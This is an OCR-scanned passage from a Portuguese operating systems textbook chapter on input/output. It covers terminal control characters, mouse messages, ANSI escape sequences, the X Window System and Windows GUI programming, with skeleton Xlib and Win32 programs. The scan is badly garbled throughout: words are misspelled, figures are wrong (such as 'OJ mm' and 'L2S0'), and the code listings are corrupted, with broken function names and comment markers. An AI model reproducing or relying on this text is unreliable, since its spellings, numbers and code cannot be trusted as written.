START 

Inicrar a saida 

DEL 

INTR 

Interromper processo (SJGINT) 

CTRLA 

QUtT 

Foręar gravaęao da imagem da memória (SlGOUIT) 

CTRL-D 

EOF 

Finał de arquivo 

CTRL-M 

CR 

Retorno do carro (nao modrficavel) 

CTRL-J 

NL 

Alinientaęao de linha (nao modificavel) 


I Tabela 5.4 Caracteres tratados espectalmenie no modo canonico. 
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preocupagao import a me para o driver retomar os buffers 
para a central de buffers, caso algum seja usado. 

Algumas vez.es a cntrada cios caracteres ERASE ou KUL 
dcve ser trat a da conio dados conums, O caractere LNEXT 
serve como mu caractere de escape. No UNIX, o CTRL-V 
e o padtao. Como lim exemplo, os sistemas UNIX antigos 
muitas vezes usavam o sinal @ para o KUL , mas o siste- 
ma de correio da Internet usa endereęos da forma lindt t @ 
ca.washington.edu. Alguem que se sima mais confortave! 
com antigas convenęoes pode redefinir o KILL como 
mas, nesse caso, necessitara inserir nm sinal @ literalmente 
para os endcreęos eletronkos. Isso pode ser feito digiiando 
CTRL-V 0 próprio CTRL-V pode ser inserido litcralmen- 
te digitando CTRL-V CTRL-V. Depois de ver um CTRL-V, 
o driver figa um sinal que indica quc o próximo caractere 
esta dispensado de processamento especial. O próprio ca¬ 
ractere LNEXT na o e inserido na fila de cara eterem 

Para permitir que os usuarios interrompam urna ima¬ 
gom na tela quc esta roiando para fora do campo dc visao, 
códigos dc controlc sao fomccidos para congclar a imagem 
e reinicializa-ia posteriormente. No UiNIX r esses códigos sao 
STOP (CTRL-S) c START (€TRL-Q), respectivamente< Elcs 
nao sao armazenados, mas sao usados para ligar e desligar 
um sinal na estrutura de dados do terminal. Sempre que 
ocorre utną temativa de saida, esse sinal e inspedonado. Se 
ele esta liga do, nao ocorre a saida. Em geral, o eco tanibem 
e omitido com a saida do programa. 

Muitas vezcs e netessario eliminar um programa des- 
controlado qtie esta sendo depurado. Os caracteres fNTR 
(DER) e QUIT (CTRL-\) podem ser usados para esse pro- 
pósilo. No UNIX, o DEL envia o sinal SIGINT para lodos os 
processos inidalizados a parlir do terminal. A implemen- 
taęao de DEL pode ser bem delicada porque, desde o prin- 
ripio, o UNIX foi criado para gerenciar niultiplos usuarios 
ao mesmo tempo. De modo geral podem exislir muitos 
processos penencentes a diferemes usuarios, e a tecla DEL 
somente pode represemar os próprios processos do usua- 
rio. A parte difiril e a obtcnęao da informaęao do drh er para 
a parte do sistema que trata os sinais, a qual afinal dc con- 
tas, nao pediu essa informaęao* 

O CTRL-\ e similar ao DEL, exceto que envia o sinal Sl- 
GQUiT, que forga a gravaęao da imagem da memória {wre 
dump) se nao for capturado ou ignorado. Quando uma des- 
sas tedas e pressionada, o driver deveria ecoar um CR c LF 
e descartar todas as entradas acumuiadas, permitindo um 
novo tnfdo. O valor pa dra o para o 1NTR e muitas vezes o 
CTRL-C cm vez de DEL, visto que muitos programas u sam 
o DEL e a teda de retrocesso de modo a Kern a do para a 
edięao. 

Um oimo caractere especial e o EOF (CTRL-DR que no 
UN1X faz com que qualquer solicitaęao pendente de leitura 
seja satisfeita com qualquer coisa que esteja disponwd no 
buffer, mesmo que o buffer esteja vazio, Digitar CTRL-D 
no imcio da linha faz com que o programa leia 0 byte, cuja 


aęao e interpretada convendonalmente como firn tle arqui- 
vo e permite que a maioria dos próg ram as aja da mesma 
maneira que eles agiriam se vissem o firn de arquivo em 
um arquivo de entrada. 

Software do mouse 

A maioria dos PCs tern um mouse ou um irackball (qtie 
nao passa de um mouse dekado de costas). O lipo mais 
conium de mouse traz uma esfera emborrachada que se 
projeta pardalmente por meio de um oriffcio e gira quando 
o mouse e movido sobre uma su perlicie aspera. Quando a 
bola gira, ela desliza contra rolos de bor radia encaixados 
em bastoes ortogonais. A movimentaęao na direęao leste- 
-oeste faz girar o ba sta o paralelo ao eixoy; a mcwimentaęao 
na direęao norte-sul faz girar o bastao para]do ao eixo a; 

Gutró tipo popular de mouse e o ótico, que tern su a 
base eąuipada com um ou mais diodos cmissorcs de luz. e 
foiodetectores, Os primciros mouses desse tipo linham de 
ser utilizados sobre um mousepad espedal, com uma grade 
retangular nagada em su a superfide para que o mouse pu- 
desse contar a quanlidade de linhas que cruzasstu Os mou¬ 
ses mais modernos possucm um m i ero proce ss a do r quc 
processa imagens e, continua men te, tira fotos de baixa rc- 
solugao da superfide e as compara em busca de alteragóes. 

Sempre que o mouse se movc por uma certa distancia 
minima em uma direęao ou um botao e pressionado ou 
liberado, uma mensagem e cnviada para o com pula don A 
distancia mm ima e em torno de OJ mm {ernbora ela possa 
ser aj u su da via software). Algumas pessoas dumam essa 
medida de mickey. Os mouses podem ter urn, dois ou tres 
botoes, dependendo da habiltdade imelectual dos usuarios, 
eslimada pelos prpjetistas, em com rola r mais do qne um 
bota o. Alguns mouses possucm rodinhas que enviam in- 
formaęoes adktonais para o compulador. Os mouses sem 
fio funcionam da mesma forma que os outros, exceto pdo 
fato de que, em vez de enviarem os dados para o compu- 
tador atraves de um fio, des o Fazem por meio de ondas de 
radio de baixa frequencia uti lizać do, por exemplo, o pa- 
drao Bluetooth. 

A mensagem para o compulador co mcm tres ilcns: Ax, 
Ay e botoes. O primetro iłem c o deslocamenlo na posięao 
x desde a ultima mensagem, Depois vem o deslocamenlo 
na posięao y desde a ultima mensagem. Por firn, o status 
dos botoes e indufdo* O fermato da mensagem depende 
do sistema e do nu mero de botoes que o mouse tcuha, Em 
geral, sao usados 3 bytes. A maioria dos mouses responde 
em um maximo dc 40 vezes/s, de modo que o mouse pode 
ter percorrido varios mickeys desde a ultima resposia. 

Notę quc o mouse ind i ca somente mudangas na posi¬ 
ęao, nao a posięao absolula em si, Se o mouse for lcvantado 
e abaixado gemilmente sem ca usa r giro na bola, nenhuma 
mensagem sera cnviada. 

Algumas inierfaces graficas fazem di Stinga o entre o 
clique slmples e o duplo em um botao do mouse. Se dois 
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cliąues acontecem muito prójdmos em espaęo (młckey) e 
tempo {niilissegundos), urn duplo dique e sinalizado. A 
defmięao para 'muito próximos' fica a cargo do software e 
ambos os parametros — espaęo e tempo ™ costumam ser 
definidos pelo usuario. 

ŁŁ21 Software de saida 

Vamos agora falar sobre o software de saida, Primeiro 
vamos tratar de safdas simpks, como a rcalizada em urna 
janela de texto — que costuma ser a preferida pelos pro- 
gra madores. Hm seguida, trata rem os das interfaces graficas, 
que ouiros usuarios costumam preferir. 

Jartelas de texto 

A salda c mais simplcs do que a entrada quando a salda 
esta seąuendalmcntc cm urna linica fonie, tamanho c cor. 
Na maioria das vczcs, o computador envia caracteres para 
o terminal qne sao la most rad os. Em gcral, urn bloco de ca¬ 
ractercs (uma linha, por excmplo) e escrito para o terminal 
cm uma chamada de sistema. 

Os editores de tela e muitos outros programas s o fisi i - 
cados predsam ser capazes de atualizar a tela em situaędes 
tomplexas, como a substituięao de uma lin ha no md o da 
Ida. Para acomodar essa necessidade, a maioria dos termi¬ 
nal* suporia uma serie de comandos para mover o cursor, 
inserir e apagar caracteres ou linhas na posięao do cursor 
etc Esscs comandos nmitas vezes sao drama dos dc $e- 
quertcias de escapes. No augc dos tcrmdnais com 25 li¬ 
ii has e 80 colimas, existiam ccntenas dc lipos dc lerminais, 
ca da qual com suas próprias seąuencias dc escapes* Como 


consequencia, era dificil escrever programas que irabalhas- 
sem em mais de urn lipo de terminal. 

Unia soluęao, introduzida no UN1X de Berkeley, foi o 
surgimento dc uma basc dc dados dc terminal chamada ter- 
mcap* Essc pacote de software definiu um mi mero dc aęoes 
basicas, como o movimeruo do cursor para uma coordenada 
(linka, celuna ). Para movcr o cursor para inna posięao es- 
pećffica, o programa — digamos, um editor — usava uma 
sequencia generica de escapes que era entao convertida 
cm uma sequcncia rcal dc escapes do terminal omie eslava 
sendo escrito, Assim, o editor funcionava em qualquer ter- 
minal que łwesse uma entrada na base de dados lermcap. 
Muitos programas para UNIX ainda trabalham dessa ma- 
neira, mesmo nos computadores pessoais. 

Mas a industria acabou pcrccbcndo a nccessidadc dc 
padronizaęao das sequencias de escapes, de modo que um 
padrao ANSI foi dcscnvolvido. Alguns dos valores sao mos- 
trados na Tabela 5*5, 

Considere como cssas seąuencias dc escapes podem 
ser usadas por um editor de texto. Suponha que o usuario 
digite um comando dizendo ao editor para apagar a linha 
3 inteira e entao reduzir o espaęo entre as linhas 2 e 4 + O 
editor pode enviar a seguinte sequenda de escapes em uma 
linha serial para o terminal: 

ESC [3; 1 H ESC [ O K ESC [ 1 M 

(em que os espaęos sao usados somente para separar os 
simbolos; eles na o sao transmitidos)* Essa sequenda move 
o cursor para o Imrio da linha 3, apaga a linha inteira e de- 
pois a remove, ja vazia, fazendo com que todas as linhas a 
partii da 5 sejam movidas uma linha acima. Entao, aąuda 


Sequencia de escape 

Significado 

ESC [ nA 

Mover n linhas para cima 

ESC [pB 

Mover n linhas para baixo 

ESC [ nC 

Mover n espaęos para a direita 

ESC [ oD 

Mover n espaęos para a esquerda 

ESC [ m:nH 

Mover o cursor para (pn.n) 

ESC [sJ 

Umpar a tela a par tir do cursor (0 ate o finał, 1 a part i r do irtfcio, 2 para ambos) 

ESC [ nK 

Limpar a linha a partir do cursor (0 ate o finał, 1 a partir do inlcio, 2 para ambos) 

ESC [ nL 

Inserir n linhas a partir do cursor 

ESC[rtM 

Exduir n linhas a partir do cursor 

ESC [ rrP 

Exciuir n caracteres a partir do cursor 

ESC [n® 

Inserir n caracteres a partir do cursor 

ESC [ nm 

Habilitar efeito n (0 = nornnal, 4 = negrito, 5 = piscante, 7 = reverso) 

ESC M 

Rolar a tela para ctma se o cursor estiver na primeira linha 


I Tabela 5.5 Sepuśncia de escapes ANSI aceita pelo driuer do terminal na saida. ESC representa o caractere ASCII {0x1 B) e n, m e s 
sao parametros numśricos opcionais. 




















Sn#lN(366 


Capitulo 5 Entrada/saida 249 


que era a linha 4 loma-se a linha 3. Aquela que era a linha 
5 torna-se a linha 4, e assmi por diante. Algumas sequen- 
rias de escapes analogas podem ser usadas para adidonar 
texto no meio da tela de video. As palavras sao adicionadas 
ou removidas dc modo similar, 

O sistema X-Window 

Quasc todos os sistemas UNfX baseiam suas tnterfaces 
no sistema X-Window (normalnienie diamado dc X), 
desenvolvido pelo MIT como parte do projeto Athena nos 
a nos 1980. Ele e bastante pariatil e executa totalmeme no 
espaęo do usuario. A primdra intenęao era que dc pudesse 
concctar um grandę nu mero de terminais de usnarios rc- 
niotos a Lim computador servidor central, portanto esta lo- 
gicamente dividido em software cliente e software Iwst, que 
pode potendalmente executar em diferentes compntado- 
res. Em computadorcs pessoais modemos, ambas as partes 
podem funcionar na mesma maąuina. Em sistemas Linux, 
os popntares anibientes Gnomę e KDE executam sobie o X. 

Quando o X esta executando em inna tnaqui na, o 
software que coleta a entrada oriunda do leclado e do 
mouse c escreye a salda na tda e diamado de seryidor 
X. Ele deve controlar a janela atnalmente ativa (na qual se 
encontra o ponteiro do mouse), para que saiba para qual 
cliente enviar qualquer entrada vinda do teclado. Ele se 
comunica com os pr ogra triasem fimrionamento (possivei- 
mente atraves dc u ma rede), denominados clientes X. Ele 
Ihes envia as entradas vindas do teclado e do mouse c acei- 
ta os comandos de cxibięao enviados por clcs. 

Pode parecer estranho que o seryidor X esteja sempre 
no computador do usuario, enquanto o cliente X pode es- 
tar em um seryidor remoto, mas pense no trabalho prin- 
cipal do servidor X, que e exibir bits na tela. Faz sentido, 
portanto, que ele esteja próximo do usuario. Da perspec- 


tiva do pr ogra ma, e um cliente dizendo ao seryidor o que 
fazer, como exibir iexlos e fig u ras geometrkas, O servidor 
(no PC local) soniente segue as ordens, assim como fazem 
todos os servidorcs. 

O arranjo dienle-semdor para a situaęao na quai o 
cliente X e o seryidor X estao em maąuinas diferentes e 
mostrado na Figura 532* Entretanto, quando o Gnomę on 
o KDE estao executando cni urna unica maquina, o clicn- 
tc e simplesmenie um programa que utiliza a biblioteca X 
que, por sua vez f conyersa com o seryidor X armazenado 
na mesma maquina (masusando uma conexaoTCPatraves 
de soąuetes, como seria no caso da comunicaęao remota)* 

O que yiabiliza a execuęao do sistema X-Window no 
UN1X (ou em qualquer outro sistema operacional) em uma 
unica maąuina ou em uma rede e o fato de o X dcfinir o 
protocolo X entre o cliente X e o seryidor X, confonne mos- 
tra a Figura 532. Nao faz diferenęa se o cliente e o seryidor 
estao na mesma maquina, sępa rad os por 100 m ao lotigo 
de uma rede ou a ąuilometros de dislancia e conectados via 
Internet. O protocolo e a operaęao do sistema sao identkos 
cm todos os casos. 

O X e simplesmcnle um sistema de gerenciamento de 
jandas. Ele nao e urna GUI complela. Para obi er unia GUI 
completa, outras camadas de software devem estar execu- 
tando no topo dele. Uma tornada e a Xlib — um conjun- 
to de rotinas de biblioteca para acessar as funcionalidades 
X. Essas rotinas formam a basc do sistema dc jandas X 
(nosso assunto seguinte), mas sao muito primitivas para 
serem acessadas di rei a men te pela maioria dos progranias 
do usuario. Por exemp!o, cada clique do mouse e captado 
separadamente, de modo quc a detcrminaęao de que dois 
cliques de fato formam um clique dupin deye ser tratada 
a ci ma do Xlib. 


Maąuina ramota 


Espaęo do 
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! Figura 5.32 Clientes e servidores no sistema X-Window do MIT 
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Para facilitar a programaęao com X, um toolkit formado 
pdo Intrinsics e fornecido como parte de X, Essa ca ma da 
gerencia botoes, barras de roi a gem e outros elememos cha- 
mados widgets, Para tomar-se u ma verdaddra interface 
GUI com uma scnsaęao e uma aparencia uniformie, outra 
ca mad a ainda e necessaria (on varias ddas)* A mais popu¬ 
lar e cha ma da de Motif, iriosirada na Figura 5.32, que e a 
base para o ambienie de trabalho comum (CDE — common 
desktop environment) utilizado no Solaris e ein ouiros sisle- 
mas UNIX comcrciais. A maiorla das aplicaęoes faz uso de 
chamadas ao Motif em vez de ao Xlib, O Gnomę e o KDE 
possuem uma estruutra semellianie a mostrada na Figu¬ 
ra 5.32, mas com bibliotecas diferentes, O Gnomę usa a 
biblioteca GTK+, e o KDE lis a a biblioieca Qt. Ainda ha 
muito debate em torno do fato de ser melhor possuir duas 
mrerfaccs graficas* 

Alem disso, e importante noiar que o gerencia niemo 
de janela nao e parie do X em si. A decisao de deixa-la de 
fora foi lotahneuie imencional. Em vezdisso, um processo 
cliente X separado, chamado de gerenciador de janela, 
controla a criaęao, a remoęao e a movLinemaęao das janelas 
na icla. Para gereneiar as jandas, ele envia comandos para 
o servidor X dizendo o que fazcr, Ele muitas vezes cxeeuta 
na mesma maąuina do clicnic X, mas leoricammte poderła 
cxecuiar em qualquer higar. 

Esse p roje to moduł ar formado de varias ca mada s e va- 
rios programas, faz com que o X seja altanieme portali! e 
flexfvel Ele tern sido levado para a maioria das versoes do 
UNIX, induindo Solaris, todas as variantes do BSD, AIX e 
Linux, tornando possivel aos que desenvolvem aplicaęoes 
terem uma interface-pa dra o do usiiario em muitas plata- 
formas. Ele tambem tern sido levado para outros sistemas 
operacionais, Em contra pa rtida, no Windows os sistemas dc 
gerendamento de janelas e a GUI sao mi stu rad os na GDI e 
colocados no nucleo, o que toina a manuteoęao mais diffcil 
de manier e, e cl aro, nao portatih 

Agora daremos uma breve olhada no X no nivel do 
XLib. Quao.dc um programo X imdaLiza, eleabre uma cone- 
xao para um ou mais semdores X — vamos chama-los de 
tttaęoes de trabalho, muilo ernbora des possani ser colocados 
na mesma maqtiiua que o próprio programa X. Esic consi- 
dera essa conexao confiavd, pois as mensagens perdidas c 
duplicadas sao tratadas pelo software de redc c dc nao tein 
de sc preocupar com os erros de comunicaęao. Em geral o 
TCP/IP e usado entre o cliente e o servidon 

Ouatro tipos de mensagens trafegam pela conexao: 

1. Comandos graficos do programa para a esiaęao de 
trabalho* 

2. Respostas das estaęóes de trabalho para as pergun- 
las dos programas, 

3. Teda do, mou.se e outros avisos dc evemos. 

4. Mensagens dc erro. 

A maioria dos comandos gra fi cos e enviada do programa 
para a estaęao de trabalho como comandos miidirecionais. 


Nenhmna resposta e esperada. A razao para esse projeto e 
que, quando o processo cliente e o processo servidor estao 
em maquinas diferentes, podera esistir um periodo subs- 
tancial dc tempo para o comando akanęar o semdor c ser 
executado. Bloąueando o aplicaiivo du ranie esse tempo, ele 
seria atrasado desnecessariameme. Por outro lado, ąuando 
o programa neccssita de informaęao da esiaęao dc traba¬ 
lho, ele predsa a pena s esperar ate que a resposta ret o me. 

Como o Windows, o X ć altamente orientado a even- 
tos* Eventos 1 lnem da estaęao de irabalho para o progra¬ 
ma, em geral como resposta a alguma aęao hu ma na, como 
um acionamenio no tedado, um movimcnlo no inouse ou 
uma janela sendo descobcrta. Ca da mensagem de evento 
tern 32 bytes; o primeiro byte fornece o lipo do evento e os 
31 bytes restantes fornecem informaęao adidonal* Exisiem 
dezenas de tipos de cvcntos, mas um programa rcccbc so- 
menle os eventos que ele deseja tratan Por exeniplo, se um 
programa nao qtier ser informado sobre as liberaęoes das 
tedas, de nao envia quaisquer evemos desse lipo. Como 
no Windows, os eventos sao enfildrados c os programas 
3eem os evemos da fila. Gontu do, diferememente do Win¬ 
dows, o sistema operadona 1 mmca chama procedimentos 
dc dentro do aplicativo por si pióprio, Ele nem mesmo sabc 
quais procedimcntos tratom quais eventos. 

Um conceito-chave do X e o recurso. Um recurso e 
uma estrutura de dados que contem certa informaęao. Os 
aplicativos criam recursos nas estaęoes de trabalho, Os re- 
cursos podcm ser conipartilhados entre varios processos na 
estaęao dc irabalho. Etes tendeni a icr vida curta c nao so- 
brevivem a um processo de inicializaęao da esiaęao de tra¬ 
balho, Emre os recursos ifpicos estao jandas, fonies, ma- 
pas (palhetas) de cores, pixmaps (mapas de bits), cursores 
c contextos graficos. Os ultimos sao usados para associar 
propriedades as jandas e sao conceitualmente similares aos 
contextos dos dispositivos no Windows* 

Um csąudeto incompleto e grosseiro dc um programa 
X e mostrado na Figura 5,33. Ele comeęa induindo algtins 
cabeęalhos e depois dedarando algumas variaveis. Entao 
cle conecta ao servidor X especificado como parimetro da 
funęao XQpenDisplay. Em seguida, ele aloca um recurso de 
janda c armazena um descrilor para cla na variavel win. Na 
pratica, alguma inicializaęao deveria oeorrer nesse momen- 
to. Após isso, de informa ao gerenciador de jandas que 
uma nova janela agora exlste, de modo que o gerenciador 
de jandas pode gerenda-ia. 

A cha mada para a funęao KcrcatcGC cria um contcxto 
grafico no qual as propriedades da janela sao armazenadas* 
Em urn programa mais complcto, das podern ser inicia- 
lizadas nesse momento, A instruęao seguimc, a cha ma da 
da funęao Ksdealnpui, diz ao servidor X quais eventos o 
programa esta [>reparado para tratar. Nesse caso, ele esta 
imeressado nos cliąucs do mouse, nos apertos das tecias e 
nos descobrimentos das jandas. (Na pratica, um programa 
real estaria imeressado em outros eventos tambem.) Por 
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tfinclude <X11/Xlib.h> 
#include <Xll/XutiLh> 


mairt(int argc, char *argvO) 
{ 

Display cfisp; 
Window win; 

GC gc; 

XEvent event; 
int running ~ 1; 


P identificador do servidor7 
P identificador da janeia 7 
/" identificador do contexto grafico V 
P armazenamento para um evento 7 


disp = XO pen D i sp lay("disp I ay....name"): /' eon ecta ao servi dor X 7 

win = XCreateSimpieWindowsfdisp t ...); /* alcca memória para a nova janeia V 

XSetStandard Properties (disp....}; p anunera a nova janeia para o gerenciador de janelas 7 

gc = XCreateGC(df$p t win, 0, 0); P cria contexto grafico 7 

XSelectlnput(disp r win, ButtonPressMark j KeyPressMask [ ExposureMask); 

XMapRaised(dfsp, win); /“mostra a janela; envia ewento de estposięao de janala 7 


While (running) { 

XNextEvent[disp h &event); /*obtem praxlmo evenlo 7 

switeh (event,type) { 

case Expose: ...; break; 

case ButtonPress; break; P processa clique do mouse 7 

case Keypress; break; /* processa entrada do teclado 7 

} 

} 


XFreeGC(disp f gc); P libera contexto grafico 7 

KDestroyW indów (disp, win); P desaloca espago de memória da janeia 7 

X Glosę Display (disp); /* termina a conexao de rede 7 


} 


I Figura 5*33 Esqueleto de Lim programa de aplicaęao do X-Window. 


fini, a ehamada da fimęao KMapRaked mapeia a nova jane- 
la na lela como a janeia mais ariina. Nesse ponio, a janeia 
toma-se vistvel na lela. 

O !aęo principal consiste cm dois comandos, sendo logi- 
camente muito mais simples que o lago correspondenie no 
Windows. O primeiro dcl es obtem um evento e o segundo 
aliva um processamento de acordo com o lipo do evcmo. 
Quando alguin evenio indica quc o programa acabou, a va- 
riavel ritmung recebe Oeo laęo termina. Antes de sair, o 
programa libera o contexto grafico, a janeia e a conexao. 

E import antę mencionar que nem todos gostam dc 
linia GUI. Muitos programadores preferem unia intcrfacc 
tradicional orieniada a lin ha de comando do lipo dtscutido 
na Seęao 5.6 2. O X irata essa questao com um programa 
chamado xterm f que eimila um terminal intdigente amigo 
YTI02 compleio, com todas as seąuencias dc escapes. As- 
sim, ed i Lor es como vi, emaes e qualqucr outro software que 
use lermcap funcionam nessas janelas sem modificaędes, 

Interfaces graficas do usuario 

A maior parte dos coniputadores pessoais oferece urna 
i nt er face grafica do u su ario {grapkical user interface — 
GUI)* O acrónimo GUI ć pronundado goocy'. 

A GUI foi invemada por Douglas Engdbart e seu grupo 
de pcsquisa no InstHuto dc Pesąuisa Stanford* Ela foi cu- 


iao copiada pelos pesąuisadores da Xerox PARC. Um lindo 
dia, steve Jobs, fundador da Apple, estava visitando PARC, 
viu oma GUI em um computador Xerox e disse algo como 
"Men Deus. Isto e o futuro da compmaęao\ Isso deu a de a 
ideia de urn novo computador, que viiia a ser o Apple Lisa, 
G Lisa era muflo caro c foi um fracasso comcrrial, mas seu 
succssor, o Macintosh, tornou-se um grandę succsso. 

Quando a Microsoft pegou um prolólipo do Macintosh 
para desenvolver urna versao do MS Office para cle, ela 
implorou a Apple para licenciar a imerface para todos, de 
forma quc ela sc tornasse o novo padrao do setor, (A Mi¬ 
crosoft ganhou muito niais dinheiro com o Office do que 
com o MS-DOS e, portanto, estava ansiosa para abandonar 
a a miga piat a forma e dispor cle urna mci hor para o Offi¬ 
ce.) Jean-Louis Gassee, o exectuivo da Apple responsavel 
pelo Macintosh, recusou a oferta e Steve Jobs ja nao es- 
tava mais por perto para ir de encontro a decisao* A Mi¬ 
crosoft, cutretanto, acabou conscguindo urna liccnęa para 
os elementos da interface* Quando o Windows comeęou 
a sc popularizar, a Appfc processou a Microsoft, a lega li¬ 
do quc a concorrente havia exccdido a liccnęa, mas o juiz 
discordou e o Windows seguiu adiante para desbancar o 
Macintosh. Se Gassce tivesse concordado com os muitos 
funcionar iosda Apple que tambem queriam licenciar o soft¬ 
ware do Macintosh para qualquer um, a empresa provavel- 
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nieme teria enriąueddo com. as taxas de licenciamento e o 
Windows lalvez nao existisse. 

Urna GUI tein ąuatro elementos essenciciisi, denotados 
pelos caracieres WIMP. Essas letras representam (Windows, 
kom , Menus e Pointhig) Janelas, leones, Menus c Apontador, 
respettivamente, As janelas sao blocos retangulares da area 
da tela usados para executar os programas. Os fcones sao 
snnbolos pequenos que podem ser dicados fazendo com 
que a Igo ma aęao ocorra. Os menus sao listas de aęoes das 
quais nma pode ser escolhida. Por firn, nm apontador pode 
ser urn mouse, um trackball ou outro dispositivo usado 
para mover um mrsor na tela e seledonar itens. 

O software de urna GUI pode ser implementado ou em 
código no nfvd do usuario, como ć fcito nos sistemas UN1X, 
ou no próprio sistema opera donaL como ć o caso do Windows, 

Nas interfaces graficas, a entrada de dados costuma ser 
Feita via tedado ou mouse, mas a salda ąuase sempre e 
diredonada a um dispositivo de hardware cbamado adap¬ 
tador grafico. Um adaptador gra fi co contćm urna memó- 
ria espcdal, chamada RAM de video, que armazena as 
imagens cxibidas na tela. Os adaptadores graficos de alta 
resoluęao cos tum a m ter processaclores de 32 ou 64 bits e 
ale I GR desua própria RAM de vtdeo, separada da memó- 
ria principal do compiitador. 

Cada adaptador grafico suporta dimensdes diferemes 
de tela. Os tamanhos mais comuns sao 1.024 x 768, L2S0 
x 960, 1.600 x L2G0 e 1.920 x 1.200. Com exceęao do 
1.920 x 1.200, todos os outros tamanhos estao na propor- 


ęao 4:3, que se aj usta ao pa dra o de televisao NTSC e PAL e 
assiin fornece pixels quadrados. O tamanho 1.920 x 1.200 
e apropriado para as telas widescreen, cuja proporęao se en- 
caixa nessa resoluęao. Na meihor resoluęao possivd, uma 
tela de vidco colorida com 24 bits por pixel requcr 6,5 MB 
dc RAM somente para contcr a imagem, dc forma quc, 
com 256 MB ou mais, o adaptador grafico pode contcr va- 
rias imagens ao mesmo tempo. Se a tela completa e restau- 
rada 75 vezes/$, a RAM de vldeo preetsa ser capaz de entre- 
gar dados continuamente em uma freąuencia de 4S9 

O software de safda para as GUIs e um tópico pesado. 
Ha livros e livros de mais de mil paginas escritos somen¬ 
te sobre a GUF do Windows (por cxemplo, Petzold, 1999; 
Simon, 1997; Reaor e Newcomer, 1997). Nesta seęao, 
podemos somente discutir su perli dal men te algtins dos 
coneeiloś fun damę mais, Para ilustrar meihor a discussao, 
dcscrevercmos a A PI Win32, que ć suporlada por lodas as 
versoe$ dc 32 bits do Windows. Em um senlido mais am¬ 
plo, o software de salda para outras GUIs c ligeiramente 
parccido, porem os dcłalhcs variam bastante. 

O i tein basico na tela e uma area re tangu lar chamada 
de janela. A posięao e o tamanho da janela sao determina- 
dos exdusivamente por meio de coordenadas (em pixels) 
de dois vertiees diagonalmeme opostos. Uma janela pode 
conter uma barra de tfrnlo, uma barra de menu, uma barra 
de ferramentas, uma barra de rola gem Ycrtical e uma barra de 
rolagem horizontaL Uma janela lipka e mostrada na Figura 
5,34, Notę que o sistema dc coordenadas do Windows colo- 
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I Figura 5.34 Um exemp!o de janela localizada na coordenada (200. 1 00) em unia tela XGA. 
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ca a origem no vertice superior esquerdo e estabdece que 
o y alimenta para baixo, o que e diferente das coordertadas 
carte si a nas usadas na matcmatica. 

Quando unia janela e criada, os parametros especifi- 
cam se a janela pode ser movida, redimensionada ou ro~ 
lada (arrastando a trava deslizante da barra dc relagcm) 
pdo usuario. A janela principal produzida pcla maioria dos 
programas pode ser movida, redimensionada e roi ad a, In¬ 
ter ferind o bastanie no modo como os programas do Win¬ 
dows sao escritos. Em particular, os programas devem ser 
informados sobrc as akeraęocs no tamanho dc suas janclas 
e estar preparados para redesenliar os conteudos dessas ja- 
nelas cm qualquer momemo, mesmo quando des menos 
esperant, 

Conscąu cti Lenienie, os programas do Windows sao 
orientados a mensagens, As aęocs do usuario que envol- 
vem o teclado ou o mousc sao capuiradas e coiwertidas 
ern mensagens para o programa propriciario da janela que 
esta sendo endereęada. Cada programa tein urna fila de 
mensagens onde sao eolocadas as mensagens relacionadas 


a todas as suas janelas. O laęo principal de urn programa 
consiste em capturar a próxima mensagem e processada, 
chamando um procedimento interno para aąuele tipo de 
mensagem. Em alguns casos, o próprio Windows pode cha- 
mar esses procedimentos diretameme, ignorando a fila de 
mensagens. Esse modelo e totalnie me diferente do código 
de procedimento do modelo UNIX que realiza chama das 
de sistema para interagir coni o sistema operadonal. O X, 
entretanto, e orientado a eventos. 

Para deixar esse modelo de programaęao mais claro, 
considcre o cxemplo da Figura Nele vcmos uni es- 
ąucteto de urn programa principal para Windows. Ele nao 
esta completo e nao realiza verificaęaode erros, mas mostra 
dctallies sufidentes para os nossos propositos, Hic inidaliza 
incluindo urn arquivo de cabeęalho, wmdows.h, o qual con- 
tem muitos tipos de dados, ma eros, constantes, protótipos 
de funęócs e out ras informaęoes neccssarias para os pro¬ 
gramas do Windows, 

O programa principal inidaliza com u ma dedaraęao 
informando sen nonie e seus parametros. A macro W1NAPI 


#include <windows.h> 

int WINAP1 WinMatnfHINSTANCE h, HINSTANCE, hprev, char *szCmd, int iCmdShow) 

{ 

W N DC LASS wndcl ass; /* objeto-cEasse pa ra esta jane I a*/ 

M S G msg; /* mensagens q u e che gam s&o agui a rmaze nad as 7 

HWND hwnd; /* ponteiro para o objęto janela 7 

/* inidaliza wnddass*/ 

wndclass.lpfnWndProc = WndProc; /* indica qual procedimento chamar7 

w ndclass. ipszC l ass Marne - " Próg ram name"; /* Texto pa ra a Ba na de Titolo 7 

wnddass.hlcon = Loadlcon{NULL, IDI ^APPLICATION); /* carrega teone do programa 7 
wndclass hCursor = LoadCursor(NULL IDC_ ARROW); /* carrega cursor do mouse */ 

RegisterCfass(awndclass): /* avisa o Windows sobre wnddass 7 

hwnd = GreateWindow (...) /* aloca espaęo para a janela*/ 

ShowWindowfhwnd, iCmdShow); /* mostra a janela na tela V 
U pd ateWi n dow( hw nd); /* avisa a j anela para pin tar-se 7 

while (GetMessagd&msg, NULL, 0, 0)) { /* obtem mensagem da fiEa 7 

T ran siatę Message (&msg); /* traduz a mensagem*/ 

DispatchMes$age(&m$g); /* envia msg para o procedimento apropriado*/ 

I 

retum(msg .w Param); 


long CALLBACK Wnd Proc (HWND hwnd, U INT message. Ul NT wParam, long t Param) 

{ 

/* Declaraęoes saocolocadas aqui*/ 
switch (message) ( 

case WM_CREATE: ...; return ...; /* cria janela */ 

case WM_PAINT: ; return...; re pi nta eon teudo da janela*/ 

caseWM_DESTROY: ; return ...; /*destróijanela*/ 

1 

return(DefWindowProc(hwnd P message, wParam, IParam));/* detault */ 


I Figura 5.35 Esque1eto de um programa principal para Windows. 
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e inna instruęao para o compilador usar uma ceria con- 
venęao de passa gem de parametros e nao sera de interesse 
maior neste estudo. O prirneiro parameiro, h t e o nome da 
mstancia e e usado para identificar o programa para o resto 
do sistema, Ale ceno porno, o Win32 e orieniado a objęto, 
o que sigm fi ca que o sistema co litem objelos (por exemplo, 
programas, arquivos e janelas) possuidores de algum esta- 
do e código associado, chamados de mćtodos, que operam 
sobre esse estado. Os objelos sao rderenciados por me i o de 
nomcs, e, no caso da do, h idcmifica o programa. O segun- 
do parameiro esia presenie somente por razoes de compa- 
tibilkiade — ele nao e mais usado. O terceiro parameiro, 
szCmd , e unia cadeia terminada em zero contendo a linha 
de comando que imcializou o programa, ainda que nao te- 
